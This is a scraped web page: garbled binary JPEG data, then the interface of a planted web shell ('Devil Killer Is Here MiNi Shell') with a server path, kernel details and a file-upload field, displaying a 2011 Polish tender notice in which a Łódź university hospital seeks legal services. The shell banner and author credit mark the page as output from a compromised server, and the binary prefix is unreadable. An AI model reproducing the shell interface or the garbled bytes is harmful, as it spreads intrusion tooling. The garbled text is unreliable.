JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111219/335699-N-2011.html

<p class="kh_header"><b>Łódź: OBSŁUGA PRAWNA</b><br>
<b>Numer ogłoszenia: 335699 - 2011; data zamieszczenia: 19.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytecki Szpital Kliniczny nr 1 im. N. Barlickiego w Łodzi , ul. Kopcińskiego 22, 90-153 Łódź, woj. łódzkie, tel. 42 677 68 24, 42 291 95 70, faks 42 678 99 52.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.barlicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSŁUGA PRAWNA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia
USK nr 1 im N. Barlickiego w Łodzi, Gm. M. Łódź, pow. m. łódzki, województwo łódzkie jest usługa
polegająca na kompleksowej obsłudze prawnej Samodzielnego Publicznego ZOZ Uniwersyteckiego
Szpitala Klinicznego nr 1 im. Norberta Barlickiego Uniwersytetu Medycznego w Łodzi wykonywanej w
siedzibie Zamawiającego. 2. Zamówienie będzie obejmowało obsługę prawną we wszystkich aspektach
działalności Szpitala, w szczególności w zakresie prawa regulującego działalność zakładów opieki
zdrowotnej (podmioty lecznicze), Prawa pracy, Prawa zamówień publicznych, Ustawy o finansach
publicznych, Ustawy o rachunkowości, ustaw podatkowych, przepisów o ubezpieczeniach społecznych
oraz aktów prawnych instytucji finansujących działalność Zamawiającego (NFZ). 3. W zakresie
obowiązków Wykonawcy będzie znajdować się miedzy innymi: a. udzielenie porad, konsultacji, opinii i
informacji prawnych; b. sporządzanie opinii prawnych w sprawach wymagających wykładni prawnej; c.
opiniowanie przedłożonych umów; d. opiniowanie pism proceduralnych w zakresie zamówień publicznych;
e. sporządzanie projektów pism kierowanych do kontrahentów Zamawiającego; f. sporządzanie
ostatecznych wezwań do zapłaty; g. sporządzanie przesądowych pism przygotowawczych; h. sporządzanie
wniosków do Krajowego Rejestru Sądowego; i. opiniowanie projektów uchwał Rady Społecznej Szpitala; j.
prowadzenie spraw sądowych; k. reprezentacja Ubezpieczonego przed Ubezpieczycielem w sprawach o
odszkodowanie; l. uczestnictwo w posiedzeniach komisji ds. orzekania o zdarzeniach medycznych; m.
przedstawianie stanowiska szpitala w sprawie błędu medycznego wraz z dowodami n. reprezentowanie
przed organami właściwymi w sprawach dot. zamówień publicznych; o. prowadzenie spraw w kwestiach
spornych z Organizacjami Związkowymi oraz zadań związanych z Radą Pracowników; p. opiniowanie
wewnętrznych aktów normatywnych Szpitala (instrukcji, regulaminów, zarządzeń, procedur, w tym również
medycznych). 4. Usługa będzie wykonywana 5 razy w tygodniu przez 2 godziny dziennie (w godzinach
10:00-14:00) w siedzibie Zamawiającego nie więcej niż 10 godzin tygodniowo. 5. Czynności dotyczące
obsługi prawnej poza siedziba Zamawiającego, Wykonawca realizować będzie także z wykorzystaniem
łączy telefonicznych lub poczty elektronicznej. 6. Czynności dotyczące obsługi prawnej poza siedzibą
Zamawiającego, Wykonawca realizować będzie w przypadku konieczności reprezentacji Szpitala przed
innymi instytucjami w tym na przykład przed Krajową Izbą Odwoławczą. 7. Czynności dotyczące
zastępstwa sądowego poza siedziba Zamawiającego Wykonawca realizować będzie w przypadku
reprezentacji w Sądach Powszechnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6
ustawy w wysokości nie większej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.10.00.00-2, 79.11.00.00-8, 79.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu
na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z
treści załączonych dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca
spełnił.- Załącznik 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę
niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym do wykonania
zamówienia Zamawiający żąda wykazu wykonanych dwóch usług prawniczych w zakresie
doradztwa oraz zastępstwa procesowego w okresie ostatnich 3 lat (jeżeli okres prowadzenia
działalności jest krótszy, w tym okresie), z podaniem ich wartości oraz daty i miejsca wykonania
na wykazie stanowiącym Załącznik Nr 6 do SIWZ oraz z załączeniem dokumentów
potwierdzających, że usługi te zostały wykonane należycie. Do wykazu proszę załączyć dwie
referencje lub inne dokumenty potwierdzające należyte wykonanie dotyczące ww. usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku dysponowania potencjałem
technicznym, Wykonawca wykaże się
dysponowaniem przynajmniej trzech osób posiadających tytuł zawodowy radcy prawnego, w
rozumieniu ustawy z dnia 6 dnia 6 lipca 1982r. o radcach prawnych (Dz. U. z 2010r. Nr 10 poz.
65 ze zm.) lub adwokata, w rozumieniu przepisów ustawy z dnia 26 maja 1982r. Prawo o
adwokaturze (Dz. U. z 2009r. Nr 146 poz. 61188 ze zm.), charakteryzujących się
doświadczeniem i kwalifikacjami: - minimum 5 lat w zawodzie radcy prawnego, adwokata lub
wyłącznie adwokata, zgodnie z zakresem przedmiotu zamówienia; - udział w świadczeniu min 1
usługi doradztwa prawnego w zakresie zamówień publicznych przez okres min. 12 miesięcy; -
reprezentowanie podmiotu działającego w służbie zdrowia w minimum 5 postępowaniach
odwoławczych przed Krajową Izbą Odwoławczą lub Sądami Powszechnymi.
liczba osób pracujących w Kancelarii lub przystępujących  do przetargu z uprawnieniami - minimum 2 osoby</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku dysponowania  osobami zdolnymi do wykonania zamówienia, Wykonawca wykaże się
dysponowaniem przynajmniej trzech osób posiadających tytuł zawodowy radcy prawnego, w
rozumieniu ustawy z dnia 6 dnia 6 lipca 1982r. o radcach prawnych (Dz. U. z 2010r. Nr 10 poz.
65 ze zm.) lub adwokata, w rozumieniu przepisów ustawy z dnia 26 maja 1982r. Prawo o
adwokaturze (Dz. U. z 2009r. Nr 146 poz. 61188 ze zm.), charakteryzujących się
doświadczeniem i kwalifikacjami: - minimum 5 lat w zawodzie radcy prawnego, adwokata lub
wyłącznie adwokata, zgodnie z zakresem przedmiotu zamówienia; - udział w świadczeniu min 1
usługi doradztwa prawnego w zakresie zamówień publicznych przez okres min. 12 miesięcy; -
reprezentowanie podmiotu działającego w służbie zdrowia w minimu w 5 postępowaniach
odwoławczych przed Krajową Izbą Odwoławczą lub Sądami Powszechnymi.
Liczba osób pracujących w Kancelarii lub przystępujących  do przetargu z uprawnieniami - minimum 2 osoby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu
na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z
treści załączonych dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca
spełnił.- Załącznik 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentacji podmiotów występujących wspólnie w postępowaniu o udzielenie
zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego - w przypadku konsorcjum lub spółki cywilnej SPOSÓB POROZUMIEWANIA SIĘ
ZAMAWIAJĄCEGO Z WYKONAWCAMI 1. Postępowanie o udzielenie zamówienia prowadzi się w języku
polskim. 2. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy mogą
przekazywać w godzinach pracy Działu Zamówień Publicznych od godziny 7:30 do 15:05 drogą
elektroniczną lub faksem z wyłączeniem złożenia oferty dla której wymagana jest forma pisemna: 2.1.
Drogą elektroniczną: 2.1.1 ze strony Wykonawcy - w zakresie dotyczącym pobierania elektronicznej wersji
SIWZ. 2.1.2 Wykonawca może zwrócić się do Zamawiającego o wyjaśnienia treści SIWZ drogą mailową na
adres swiatlowska@poczta.onet.pl. Zamawiający prosi o przesyłanie zapytań do przetargu dodatkowo
formacie WORD, 2.1.3 ze strony Zamawiającego - w zakresie udostępnienia elektronicznej wersji SIWZ
oraz umieszczania treści pism skierowanych do Wykonawców na stronie internetowej Zamawiającego
http://www.barlicki.pl oraz wszelkiej korespondencji między stronami. 2.2. Faksem na numer 42 678-99-52:
w zakresie wszelkiej korespondencji między stronami z wyłączeniem złożenia oferty; 2.3. W zakresie
uzupełnienia oferty w trybie art. 26 ust. 3 PZP Wykonawca może dostarczyć dokumenty drogą
elektroniczną lub faksem, jednakże do upływu wyznaczonego terminu uzupełnienia dokumentów, muszą
one wpłynąć do Zamawiającego w formie pisemnej.
III.7) Czy ogranicza się możliwość ubiegania się o zamówienie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany wymienione w ust. 2 ppkt. a mogą być dokonane na wniosek Wykonawcy w terminie 14 dni od
dnia przesłania zawiadomienia w formie aneksu do umowy. 2. Zmiany cen usług, będących przedmiotem
niniejszej umowy, mogą być dokonywane w następujących przypadkach: a). w przypadku zmian stawek
podatku od towarów i usług , przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez
zmian; 3. Zamawiający zastrzega możliwość rozwiązania niniejszej umowy ze skutkiem natychmiastowym,
w przypadku rażącego naruszania jej postanowień przez drugą stronę. 4. W przypadku nie zakończenia
prowadzonych spraw w ramach 12 miesięcy trwania umowy Zamawiający przewiduje możliwość
przedłużenia umowy na kolejny okres , ale nie dłużej niż na 2 miesiące. 5. Niezależnie od powyższego,
umowa wygasa z dniem zaprzestania działalności leczniczej lub zmiany profilu tej działalności przez
Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.barlicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dziale Zamówień
Publicznych SP ZOZ USK Nr 1 UM w Łodzi, 90-153 Łódź, ul. Kopcińskiego 22, pokój 208, II piętro w
budynku administracyjnym..
IV.4.4) Termin składania wniosków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 09:00, miejsce: Sekretariacie Finansowo - Technicznym SP ZOZ USK nr 1 UM w Łodzi, 90-153
Łódź, ul. Kopcińskiego 22, pokój 201, II piętro w budynku administracyjnym..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com